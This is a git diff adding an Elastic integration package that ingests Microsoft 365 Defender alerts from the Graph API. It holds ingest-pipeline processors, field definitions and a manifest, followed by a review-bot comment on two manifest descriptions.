+ target_field: _ingest._value.parent_process.image_file.name
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_parentProcessImageFile_filepath
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.parentProcessImageFile.filePath
+ tag: rename_foreach_evidence_parentProcessImageFile_filepath
+ target_field: _ingest._value.parent_process.image_file.path
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_parentProcessImageFile_filepublisher
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.parentProcessImageFile.filePublisher
+ tag: rename_foreach_evidence_parentProcessImageFile_filepublisher
+ target_field: _ingest._value.parent_process.image_file.publisher
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_convert_parentProcessImageFile_filesize
+ if: ctx.json?.evidence instanceof List
+ processor:
+ convert:
+ field: _ingest._value.parentProcessImageFile.fileSize
+ tag: convert_foreach_evidence_parentProcessImageFile_filesize
+ target_field: _ingest._value.parent_process.image_file.size
+ type: long
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.parentProcessImageFile.fileSize
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_parentProcessImageFile_issuer
+ if: ctx.json?.evidence instanceof List
+ processor:
+ 
rename: + field: _ingest._value.parentProcessImageFile.issuer + tag: rename_foreach_evidence_parentProcessImageFile_issuer + target_field: _ingest._value.parent_process.image_file.issuer + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_parentProcessImageFile_signer + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.parentProcessImageFile.signer + tag: rename_foreach_evidence_parentProcessImageFile_signer + target_field: _ingest._value.parent_process.image_file.signer + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_registryHive + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.registryHive + tag: rename_foreach_evidence_registryHive + target_field: _ingest._value.registry_hive + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_registryHive + if: ctx.json?.evidence instanceof List + processor: + append: + field: registry.hive + tag: append_foreach_evidence_registryHive + value: '{{{_ingest._value.registry_hive}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_registryKey + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.registryKey + tag: rename_foreach_evidence_registryKey + target_field: _ingest._value.registry_key + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_registryKey + if: ctx.json?.evidence instanceof List + processor: + append: + field: registry.key + tag: append_foreach_evidence_registryKey + value: '{{{_ingest._value.registry_key}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_registryValueType + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.registryValueType + tag: rename_foreach_evidence_registryValueType + target_field: 
_ingest._value.registry_value_type + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_registryValueType + if: ctx.json?.evidence instanceof List + processor: + append: + field: registry.data.type + tag: append_foreach_evidence_registryValueType + value: '{{{_ingest._value.registry_value_type}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_registryValue + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.registryValue + tag: rename_foreach_evidence_registryValue + target_field: _ingest._value.registry_value + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_registryValue + if: ctx.json?.evidence instanceof List + processor: + append: + field: registry.value + tag: append_foreach_evidence_registryValue + value: '{{{_ingest._value.registry_value}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_registryValueName + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.registryValueName + tag: rename_foreach_evidence_registryValueName + target_field: _ingest._value.registry_value_name + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_securityGroupId + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.securityGroupId + tag: rename_foreach_evidence_securityGroupId + target_field: _ingest._value.security_group_id + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_securityGroupId + if: ctx.json?.evidence instanceof List + processor: + append: + field: group.id + tag: append_foreach_evidence_securityGroupId + value: '{{{_ingest._value.security_group_id}}}' + allow_duplicates: false + - script: + description: Map ecs fields based on evidence type. 
+ tag: script_to_map_evidence_ecs_fields + lang: painless + if: ctx.json?.evidence instanceof List + source: + def convertToOrderedArray(def list) { + def result = new ArrayList(); + for (element in list) { + result.add(element); + } + Collections.sort(result); + return result; + } + if (!(ctx.cloud instanceof HashMap)) { + ctx.cloud = new HashMap(); + } + def cloudProvider = new HashSet(); + if (!(ctx.group instanceof HashMap)) { + ctx.group = new HashMap(); + } + def groupName = new HashSet(); + if (!(ctx.host instanceof HashMap)) { + ctx.host = new HashMap(); + } + def hostId = new HashSet(); + if (!(ctx.user instanceof HashMap)) { + ctx.user = new HashMap(); + } + def userDomain = new HashSet(); + def userId = new HashSet(); + def userName = new HashSet(); + def userEmail = new HashSet(); + if (!(ctx.process instanceof HashMap)) { + ctx.process = new HashMap(); + } + ctx.process.user = new HashMap(); + def processUserId = new HashSet(); + def processUserName = new HashSet(); + for (evidence in ctx.json.evidence) { + if (evidence?.odata_type == null) { + continue + } + if (evidence?.odata_type == '#microsoft.graph.security.securityGroupEvidence') { + if (evidence?.display_name != null) { + groupName.add(evidence.display_name); + } + } + if (evidence?.odata_type == '#microsoft.graph.security.deviceEvidence') { + if (evidence?.mde_device_id != null) { + hostId.add(evidence.mde_device_id); + } + } + if (['#microsoft.graph.security.mailboxEvidence', '#microsoft.graph.security.userEvidence'].contains(evidence.odata_type)) { + if (evidence?.user_account?.domain_name != null) { + userDomain.add(evidence.user_account.domain_name); + } + if (evidence?.user_account?.azure_ad_user_id != null) { + userId.add(evidence.user_account.azure_ad_user_id); + } + if (evidence?.user_account?.user_principal_name != null) { + userEmail.add(evidence.user_account.user_principal_name); + } + if (evidence?.user_account?.account_name != null) { + 
userName.add(evidence.user_account.account_name); + } + } + if (evidence?.odata_type == '#microsoft.graph.security.processEvidence') { + if (evidence?.user_account?.azure_ad_user_id != null) { + processUserId.add(evidence.user_account.azure_ad_user_id); + } + if (evidence?.user_account?.account_name != null) { + processUserName.add(evidence.user_account.account_name); + } + } + if (evidence?.vm_metadata?.cloud_provider != null && evidence.vm_metadata.cloud_provider.toLowerCase() == 'azure') { + cloudProvider.add('azure'); + } + } + if (!cloudProvider.isEmpty()) { + ctx.cloud.provider = convertToOrderedArray(cloudProvider); + } + if (!groupName.isEmpty()) { + ctx.group.name = convertToOrderedArray(groupName); + } + if (!hostId.isEmpty()) { + ctx.host.id = convertToOrderedArray(hostId); + } + if (!userDomain.isEmpty()) { + ctx.user.domain = convertToOrderedArray(userDomain); + } + if (!userId.isEmpty()) { + ctx.user.id = convertToOrderedArray(userId); + } + if (!userName.isEmpty()) { + ctx.user.name = convertToOrderedArray(userName); + } + if (!userEmail.isEmpty()) { + ctx.user.email = convertToOrderedArray(userEmail); + } + if (!processUserId.isEmpty()) { + ctx.process.user.id = convertToOrderedArray(processUserId); + } + if (!processUserName.isEmpty()) { + ctx.process.user.name = convertToOrderedArray(processUserName); + } + - script: + description: Set file.size, process.id, process.parent.id fields. 
+ tag: script_to_set_file_process_and_process_parent_fields + lang: painless + if: ctx.json?.evidence instanceof List + source: + def convertToOrderedArray(def list) { + def result = new ArrayList(); + for (element in list) { + result.add(element); + } + Collections.sort(result); + return result; + } + if (!(ctx.file instanceof HashMap)) { + ctx.file = new HashMap(); + } + if (!(ctx.process instanceof HashMap)) { + ctx.process = new HashMap(); + } + if (!(ctx.process.parent instanceof HashMap)) { + ctx.process.parent = new HashMap(); + } + def fileSize = new HashSet(); + def processPid = new HashSet(); + def processParentPid = new HashSet(); + for (evidence in ctx.json.evidence) { + if (evidence?.odata_type == null) { + continue + } + if (evidence?.odata_type == '#microsoft.graph.security.fileEvidence') { + if (evidence?.file_details?.size != null) { + fileSize.add(evidence.file_details.size); + } + } else if (evidence?.odata_type == '#microsoft.graph.security.processEvidence') { + if (evidence?.process?.id != null) { + processPid.add(evidence.process.id); + } + if (evidence?.parent_process?.id != null) { + processParentPid.add(evidence.parent_process.id); + } + } + } + if (!fileSize.isEmpty()) { + ctx.file.size = convertToOrderedArray(fileSize); + } + if (!processPid.isEmpty()) { + ctx.process.pid = convertToOrderedArray(processPid); + } + if (!processParentPid.isEmpty()) { + ctx.process.parent.pid = convertToOrderedArray(processParentPid); + } + - foreach: + field: json.evidence + tag: foreach_evidence_remove_fields + if: ctx.json?.evidence instanceof List + processor: + remove: + field: + - _ingest._value.createdDateTime + - _ingest._value.receivedDateTime + - _ingest._value.attachmentsCount + - _ingest._value.firstSeenDateTime + - _ingest._value.parentProcessCreationDateTime + - _ingest._value.processCreationDateTime + - _ingest._value.senderIp + - _ingest._value.urlCount + - _ingest._value.instanceId + - _ingest._value.appId + - _ingest._value.saasAppId + - 
_ingest._value.osBuild + - _ingest._value.rbacGroupId + - _ingest._value.fileDetails.fileSize + - _ingest._value.ipAddress + - _ingest._value.emailCount + - _ingest._value.parentProcessId + - _ingest._value.processId + - _ingest._value.imageFile.fileSize + - _ingest._value.parentProcessImageFile.fileSize + ignore_missing: true + - rename: + field: json.evidence + tag: rename_evidence + target_field: m365_defender.alert.evidence + ignore_missing: true + - remove: + if: ctx.tags == null || !(ctx.tags.contains('preserve_duplicate_custom_fields')) + tag: remove_ecs_duplicate_fields + field: + - m365_defender.alert.last_update_datetime + - m365_defender.alert.description + - m365_defender.alert.created_datetime + - m365_defender.alert.last_activity_datetime + - m365_defender.alert.id + - m365_defender.alert.service_source + - m365_defender.alert.first_activity_datetime + - m365_defender.alert.web_url + - m365_defender.alert.assigned_to + - m365_defender.alert.threat_family_name + - m365_defender.alert.category + - m365_defender.alert.mitre_techniques + - m365_defender.alert.tenant_id + ignore_missing: true + - foreach: + field: m365_defender.alert.evidence + tag: remove_foreach_ecs_duplicate_fields + if: ctx.m365_defender?.alert?.evidence instanceof List && (ctx.tags == null || !(ctx.tags.contains('preserve_duplicate_custom_fields'))) + processor: + remove: + field: + - _ingest._value.ip_address + - _ingest._value.detection_status + - _ingest._value.received_datetime + - _ingest._value.antispam_direction + - _ingest._value.subject + - _ingest._value.recipient_email_address + - _ingest._value.instance_id + - _ingest._value.instance_name + - _ingest._value.vm_metadata.cloud_provider + - _ingest._value.os_platform + - _ingest._value.version + - _ingest._value.file_details.sha1 + - _ingest._value.file_details.sha256 + - _ingest._value.file_details.name + - _ingest._value.file_details.path + - _ingest._value.file_details.size + - _ingest._value.process.command_line + - 
_ingest._value.image_file.sha1 + - _ingest._value.image_file.sha256 + - _ingest._value.parent_process.image_file.sha1 + - _ingest._value.parent_process.image_file.sha256 + - _ingest._value.parent_process.id + - _ingest._value.parent_process.creation_datetime + - _ingest._value.process.id + - _ingest._value.process.creation_datetime + - _ingest._value.registry_value_type + - _ingest._value.registry_hive + - _ingest._value.registry_key + - _ingest._value.registry_value + - _ingest._value.security_group_id + ignore_missing: true + - remove: + field: json + tag: remove_json + ignore_missing: true + - remove: + field: event.original + tag: remove_event_original + ignore_missing: true + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + - script: + tag: script_to_drop_null_values + lang: painless + source: |- + boolean drop(Object object) { + if (object == null || object == '') { + return true; + } else if (object instanceof Map) { + ((Map) object).values().removeIf(v -> drop(v)); + return (((Map) object).size() == 0); + } else if (object instanceof List) { + ((List) object).removeIf(v -> drop(v)); + return (((List) object).length == 0); + } + return false; + } + drop(ctx); + description: Drops null/empty values recursively. + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - append: + field: event.kind + value: pipeline_error + allow_duplicates: false + if: ctx.error?.message != null +on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.kind + value: pipeline_error 
diff --git a/packages/m365_defender/data_stream/alert/fields/base-fields.yml b/packages/m365_defender/data_stream/alert/fields/base-fields.yml
new file mode 100644
index 00000000000..bbcb02bdd75
--- /dev/null
+++ b/packages/m365_defender/data_stream/alert/fields/base-fields.yml
@@ -0,0 +1,20 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: event.module
+ type: constant_keyword
+ description: Event module.
+ value: m365_defender
+- name: event.dataset
+ type: constant_keyword
+ description: Event dataset.
+ value: m365_defender.alert
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
diff --git a/packages/m365_defender/data_stream/alert/fields/beats.yml b/packages/m365_defender/data_stream/alert/fields/beats.yml
new file mode 100644
index 00000000000..b3701b581cf
--- /dev/null
+++ b/packages/m365_defender/data_stream/alert/fields/beats.yml
@@ -0,0 +1,9 @@
+- name: input.type
+ type: keyword
+ description: Type of filebeat input.
+- name: log.offset
+ type: long
+ description: Log offset.
+- name: tags
+ type: keyword
+ description: User defined tags.
diff --git a/packages/m365_defender/data_stream/alert/fields/fields.yml b/packages/m365_defender/data_stream/alert/fields/fields.yml
new file mode 100644
index 00000000000..071b21fc9c8
--- /dev/null
+++ b/packages/m365_defender/data_stream/alert/fields/fields.yml
@@ -0,0 +1,506 @@ +- name: m365_defender.alert + type: group + fields: + - name: actor_display_name + type: keyword + description: The adversary or activity group that is associated with this alert. + - name: assigned_to + type: keyword + description: Owner of the alert, or null if no owner is assigned. + - name: category + type: keyword + description: The attack kill-chain category that the alert belongs to. Aligned with the MITRE ATT&CK framework. + - name: classification + type: keyword + description: 'Specifies whether the alert represents a true threat. Possible values are: unknown, falsePositive, truePositive, benignPositive, unknownFutureValue.' + - name: comments + type: flattened + description: Array of comments created by the Security Operations (SecOps) team during the alert management process. + - name: created_datetime + type: date + description: Time when Microsoft 365 Defender created the alert. + - name: description + type: keyword + description: String value describing each alert. + - name: detection_source + type: keyword + description: Detection technology or sensor that identified the notable component or activity. + - name: detector_id + type: keyword + description: The ID of the detector that triggered the alert. + - name: determination + type: keyword + description: 'Specifies the result of the investigation, whether the alert represents a true attack and if so, the nature of the attack. Possible values are: unknown, apt, malware, securityPersonnel, securityTesting, unwantedSoftware, other, multiStagedAttack, compromisedUser, phishing, maliciousUserActivity, clean, insufficientData, confirmedUserActivity, lineOfBusinessApplication, unknownFutureValue.' + - name: evidence + type: group + fields: + - name: antispam_direction + type: keyword + description: 'Direction of the email relative to your network. The possible values are: Inbound, Outbound or Intraorg.' + - name: app_id + type: keyword + description: Unique identifier of the application. 
+ - name: attachments_count + type: long + description: Number of attachments in the email. + - name: azure_ad_device_id + type: keyword + description: A unique identifier assigned to a device by Azure Active Directory (Azure AD) when device is Azure AD-joined. + - name: cluster_by + type: keyword + description: The clustering logic of the emails inside the cluster. + - name: cluster_by_value + type: keyword + description: The value utilized to cluster the similar emails. + - name: created_datetime + type: date + description: The time the evidence was created and added to the alert. + - name: defender_av_status + type: keyword + description: 'State of the Defender AntiMalware engine. The possible values are: notReporting, disabled, notUpdated, updated, unknown, notSupported, unknownFutureValue.' + - name: delivery_action + type: keyword + description: 'Delivery action of the email. The possible values are: Delivered, DeliveredAsSpam, Junked, Blocked, or Replaced.' + - name: delivery_location + type: keyword + description: 'Location where the email was delivered. The possible values are: Inbox, External, JunkFolder, Quarantine, Failed, Dropped, DeletedFolder or Forwarded.' + - name: detailed_roles + type: keyword + description: Detailed roles of the user associated with the event. + - name: detection_status + type: keyword + description: 'The status of the detection.The possible values are: detected, blocked, prevented, unknownFutureValue.' + - name: device_dns_name + type: keyword + description: The fully qualified domain name (FQDN) for the device. + - name: display_name + type: keyword + description: Name of the application. + - name: email_count + type: long + description: Count of emails in the email cluster. + - name: file_details + type: group + fields: + - name: issuer + type: keyword + description: The certificate authority (CA) that issued the certificate. + - name: name + type: keyword + description: The name of the file. 
+ - name: odata_type + type: keyword + - name: path + type: keyword + description: The file path (location) of the file instance. + - name: publisher + type: keyword + description: The publisher of the file. + - name: sha1 + type: keyword + description: The Sha1 cryptographic hash of the file content. + - name: sha256 + type: keyword + description: The Sha256 cryptographic hash of the file content. + - name: signer + type: keyword + description: The signer of the signed file. + - name: size + type: long + description: The size of the file in bytes. + - name: first_seen_datetime + type: date + description: The date and time when the device was first seen. + - name: health_status + type: keyword + description: 'The health state of the device.The possible values are: active, inactive, impairedCommunication, noSensorData, noSensorDataImpairedCommunication, unknown, unknownFutureValue.' + - name: image_file + type: group + fields: + - name: issuer + type: keyword + description: The certificate authority (CA) that issued the certificate. + - name: name + type: keyword + description: The name of the file. + - name: odata_type + type: keyword + - name: path + type: keyword + description: The file path (location) of the file instance. + - name: publisher + type: keyword + description: The publisher of the file. + - name: sha1 + type: keyword + description: The Sha1 cryptographic hash of the file content. + - name: sha256 + type: keyword + description: The Sha256 cryptographic hash of the file content. + - name: signer + type: keyword + description: The signer of the signed file. + - name: size + type: long + description: The size of the file in bytes. + - name: instance_id + type: keyword + description: Identifier of the instance of the Software as a Service (SaaS) application. + - name: instance_name + type: keyword + description: Name of the instance of the SaaS application. 
+ - name: internet_message_id + type: keyword + description: Public-facing identifier for the email that is set by the sending email system. + - name: ip_address + type: ip + description: The value of the IP Address, can be either in V4 address or V6 address format. + - name: ip_interfaces + type: ip + description: IP Interfaces related to the event. + - name: language + type: keyword + description: Detected language of the email content. + - name: logged_on_users + type: group + fields: + - name: account_name + type: keyword + description: User account name of the logged-on user. + - name: domain_name + type: keyword + description: User account domain of the logged-on user. + - name: odata_type + type: keyword + - name: mde_device_id + type: keyword + description: A unique identifier assigned to a device by Microsoft Defender for Endpoint. + - name: network_message_id + type: keyword + description: Unique identifier for the email, generated by Microsoft 365. + - name: network_message_ids + type: keyword + description: Unique identifiers for the emails in the cluster, generated by Microsoft 365. + - name: object_id + type: keyword + description: The unique identifier of the application object in Azure AD. + - name: odata_type + type: keyword + - name: onboarding_status + type: keyword + description: 'The status of the machine onboarding to Microsoft Defender for Endpoint.The possible values are: insufficientInfo, onboarded, canBeOnboarded, unsupported, unknownFutureValue.' + - name: os_build + type: keyword + description: The build version for the operating system the device is running. + - name: os_platform + type: keyword + description: The operating system platform the device is running. + - name: p1_sender + type: group + fields: + - name: display_name + type: keyword + description: The name of the sender. + - name: domain_name + type: keyword + description: Sender domain. + - name: email_address + type: keyword + description: Sender email address. 
+ - name: odata_type + type: keyword + - name: p2_sender + type: group + fields: + - name: display_name + type: keyword + description: The name of the sender. + - name: domain_name + type: keyword + description: Sender domain. + - name: email_address + type: keyword + description: Sender email address. + - name: odata_type + type: keyword + - name: parent_process + type: group + fields: + - name: creation_datetime + type: date + description: Date and time when the parent of the process was created. + - name: id + type: long + description: Process ID (PID) of the parent process that spawned the process. + - name: image_file + type: group + fields: + - name: issuer + type: keyword + description: The certificate authority (CA) that issued the certificate. + - name: name + type: keyword + description: The name of the file. + - name: odata_type + type: keyword + - name: path + type: keyword + description: The file path (location) of the file instance. + - name: publisher + type: keyword + description: The publisher of the file. + - name: sha1 + type: keyword + description: The Sha1 cryptographic hash of the file content. + - name: sha256 + type: keyword + description: The Sha256 cryptographic hash of the file content. + - name: signer + type: keyword + description: The signer of the signed file. + - name: size + type: long + description: The size of the file in bytes. + - name: primary_address + type: keyword + description: The primary email address of the mailbox. + - name: process + type: group + fields: + - name: command_line + type: keyword + description: Command line used to create the new process. + - name: creation_datetime + type: date + description: Date and time the process was created. + - name: id + type: long + description: Process ID (PID) of the newly created process. + - name: publisher + type: keyword + description: The name of the application publisher. + - name: query + type: keyword + description: The query used to identify the email cluster. 
+ - name: rbac_group + type: group + fields: + - name: id + type: keyword + description: The ID of the role-based access control (RBAC) device group. + - name: name + type: keyword + description: The name of the RBAC device group. + - name: received_datetime + type: date + description: Date and time when the email was received. + - name: recipient_email_address + type: keyword + description: Email address of the recipient, or email address of the recipient after distribution list expansion. + - name: registry_hive + type: keyword + description: Registry hive of the key that the recorded action was applied to. + - name: registry_key + type: keyword + description: Registry key that the recorded action was applied to. + - name: registry_value + type: keyword + description: Data of the registry value that the recorded action was applied to. + - name: registry_value_name + type: keyword + description: Name of the registry value that the recorded action was applied to. + - name: registry_value_type + type: keyword + description: Data type, such as binary or string, of the registry value that the recorded action was applied to. + - name: remediation_status + type: keyword + description: 'Status of the remediation action taken. The possible values are: none, remediated, prevented, blocked, notFound, active, pendingApproval, declined, notRemediated, running, unknownFutureValue.' + - name: remediation_status_details + type: keyword + description: Details about the remediation status. + - name: risk_score + type: keyword + description: 'Risk score as evaluated by Microsoft Defender for Endpoint. The possible values are: none, informational, low, medium, high, unknownFutureValue.' + - name: roles + type: keyword + description: The role/s that an evidence entity represents in an alert, e.g., an IP address that is associated with an attacker will have the evidence role "Attacker". + - name: saas_app_id + type: keyword + description: The identifier of the SaaS application. 
+ - name: security_group_id + type: keyword + description: Unique identifier of the security group. + - name: sender_ip + type: ip + description: IP address of the last detected mail server that relayed the message. + - name: subject + type: keyword + description: Subject of the email. + - name: tags + type: keyword + description: Array of custom tags associated with an evidence instance, for example to denote a group of devices, high value assets, etc. + - name: threat_detection_methods + type: keyword + description: Collection of methods used to detect malware, phishing, or other threats found in the email. + - name: threats + type: keyword + description: Collection of detection names for malware or other threats found. + - name: type + type: keyword + - name: url + type: keyword + description: The Unique Resource Locator (URL). + - name: url_count + type: long + description: Number of embedded URLs in the email. + - name: urls + type: keyword + description: Collection of the URLs contained in this email. + - name: urn + type: keyword + description: Uniform resource name (URN) of the automated investigation where the cluster was identified. + - name: user_account + type: group + fields: + - name: account_name + type: keyword + description: The user account's displayed name. + - name: azure_ad_user_id + type: keyword + description: The user object identifier in Azure AD. + - name: domain_name + type: keyword + description: The name of the Active Directory domain of which the user is a member. + - name: odata_type + type: keyword + - name: user_principal_name + type: keyword + description: The user principal name of the account in Azure AD. + - name: user_sid + type: keyword + description: The local security identifier of the user account. + - name: verdict + type: keyword + description: 'The decision reached by automated investigation. The possible values are: unknown, suspicious, malicious, noThreatsFound, unknownFutureValue.' 
+ - name: version
+ type: keyword
+ description: The version of the operating system platform.
+ - name: vm_metadata
+ type: group
+ fields:
+ - name: cloud_provider
+ type: keyword
+ description: 'The cloud provider hosting the virtual machine. The possible values are: unknown, azure, unknownFutureValue.'
+ - name: odata_type
+ type: keyword
+ - name: resource_id
+ type: keyword
+ description: Unique identifier of the Azure resource.
+ - name: subscription_id
+ type: keyword
+ description: Unique identifier of the Azure subscription the customer tenant belongs to.
+ - name: vm_id
+ type: keyword
+ description: Unique identifier of the virtual machine instance.
+ - name: first_activity_datetime
+ type: date
+ description: The earliest activity associated with the alert.
+ - name: id
+ type: keyword
+ description: Unique identifier to represent the alert resource.
+ - name: incident_id
+ type: keyword
+ description: Unique identifier to represent the incident this alert resource is associated with.
+ - name: incident_web_url
+ type: group
+ description: URL for the incident page in the Microsoft 365 Defender portal.
+ fields:
+ - name: domain
+ type: keyword
+ - name: extension
+ type: keyword
+ - name: fragment
+ type: keyword
+ - name: full
+ type: keyword
+ - name: original
+ type: keyword
+ - name: password
+ type: keyword
+ - name: path
+ type: keyword
+ - name: port
+ type: long
+ - name: query
+ type: keyword
+ - name: scheme
+ type: keyword
+ - name: username
+ type: keyword
+ - name: last_activity_datetime
+ type: date
+ description: The oldest activity associated with the alert.
+ - name: last_update_datetime
+ type: date
+ description: Time when the alert was last updated at Microsoft 365 Defender.
+ - name: mitre_techniques
+ type: keyword
+ description: The attack techniques, as aligned with the MITRE ATT&CK framework.
+ - name: odata_type
+ type: keyword
+ - name: provider_alert_id
+ type: keyword
+ description: The ID of the alert as it appears in the security provider product that generated the alert.
+ - name: recommended_actions
+ type: keyword
+ description: Recommended response and remediation actions to take in the event this alert was generated.
+ - name: resolved_datetime
+ type: date
+ description: Time when the alert was resolved.
+ - name: service_source
+ type: keyword
+ description: 'The service or product that created this alert. Possible values are: microsoftDefenderForEndpoint, microsoftDefenderForIdentity, microsoftCloudAppSecurity, microsoftDefenderForOffice365, microsoft365Defender, aadIdentityProtection, appGovernance, dataLossPrevention.'
+ - name: severity
+ type: keyword
+ description: 'Indicates the possible impact on assets. The higher the severity the bigger the impact. Typically higher severity items require the most immediate attention. Possible values are: unknown, informational, low, medium, high, unknownFutureValue.'
+ - name: status
+ type: keyword
+ description: 'The status of the alert. Possible values are: new, inProgress, resolved, unknownFutureValue.'
+ - name: tenant_id
+ type: keyword
+ description: The Azure Active Directory tenant the alert was created in.
+ - name: threat_display_name
+ type: keyword
+ description: The threat associated with this alert.
+ - name: threat_family_name
+ type: keyword
+ description: Threat family associated with this alert.
+ - name: title
+ type: keyword
+ description: Brief identifying string value describing the alert.
+ - name: web_url
+ type: group
+ description: URL for the alert page in the Microsoft 365 Defender portal.
+ fields:
+ - name: domain
+ type: keyword
+ - name: extension
+ type: keyword
+ - name: fragment
+ type: keyword
+ - name: full
+ type: keyword
+ - name: original
+ type: keyword
+ - name: password
+ type: keyword
+ - name: path
+ type: keyword
+ - name: port
+ type: long
+ - name: query
+ type: keyword
+ - name: scheme
+ type: keyword
+ - name: username
+ type: keyword
diff --git a/packages/m365_defender/data_stream/alert/manifest.yml b/packages/m365_defender/data_stream/alert/manifest.yml
new file mode 100644
index 00000000000..98d02f16c24
--- /dev/null
+++ b/packages/m365_defender/data_stream/alert/manifest.yml
@@ -0,0 +1,81 @@
+title: Collect Alert logs from Microsoft 365 Defender
+type: logs
+streams:
+ - input: httpjson
+ title: M365D Alerts
+ description: Collect Alerts from M365 Defender.
+ template_path: httpjson.yml.hbs
+ vars:
+ - name: request_url
+ type: text
+ title: Request URL
+ description: URL of API endpoint.
+ default: https://graph.microsoft.com
+ multi: false
+ required: true
+ show_user: false
+ - name: initial_interval
+ type: text
+ title: Initial Interval
+ description: How far back to pull the alerts from Microsoft 365 Defender. Supported units for this parameter are h/m/s.
+ multi: false
+ required: true
+ show_user: true
+ default: 24h
+ - name: interval
+ type: text
+ title: Interval
+ description: Duration between requests to the Microsoft Security Graph API V2. Supported units for this parameter are h/m/s.
+ default: 5m
+ multi: false
+ required: true
+ show_user: true
+ - name: batch_size
+ type: integer
+ title: Batch Size
+ description: Batch size for the response of the Alert Security Graph API V2. The maximum supported batch size value is 2000.
+ default: 2000
+ multi: false
+ required: true
+ show_user: false
+ - name: http_client_timeout
+ type: text
+ title: HTTP Client Timeout
+ description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h.
+ multi: false
+ required: true
+ show_user: false
+ default: 30s
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: true
+ show_user: false
+ default:
+ - forwarded
+ - m365_defender-alert
+ - name: preserve_original_event
+ required: true
+ show_user: true
+ title: Preserve original event
+ description: Preserves a raw copy of the original event, added to the field `event.original`.
+ type: bool
+ multi: false
+ default: false
+ - name: preserve_duplicate_custom_fields
+ required: true
+ show_user: false
+ title: Preserve duplicate custom fields
+ description: Preserve m365_defender.alert fields that were copied to Elastic Common Schema (ECS) fields.
+ type: bool
+ multi: false
+ default: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >-
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
diff --git a/packages/m365_defender/data_stream/alert/sample_event.json b/packages/m365_defender/data_stream/alert/sample_event.json
new file mode 100644
index 00000000000..0304a2aaec6
--- /dev/null
+++ b/packages/m365_defender/data_stream/alert/sample_event.json
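Review bot: `request_url` is described only as `URL of API endpoint.` while its default is the bare Graph host, so the manifest does not tell an operator whether the alerts path is appended by the stream template (httpjson.yml.hbs, not in this hunk) or must be supplied by them, and a value carrying a trailing path would presumably yield malformed requests with no hint from the policy editor. Suggest `description: Base URL of the Microsoft Graph API (scheme and host only, no path); change it only when your tenant is served by a Graph endpoint other than the default.`. The `batch_size` description states the 2000 maximum, but nothing in the manifest enforces it, so a larger value would presumably be rejected by the API at run time rather than when the policy is saved; appending `This limit is not validated by the integration.` to that description would make the failure mode explicit.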
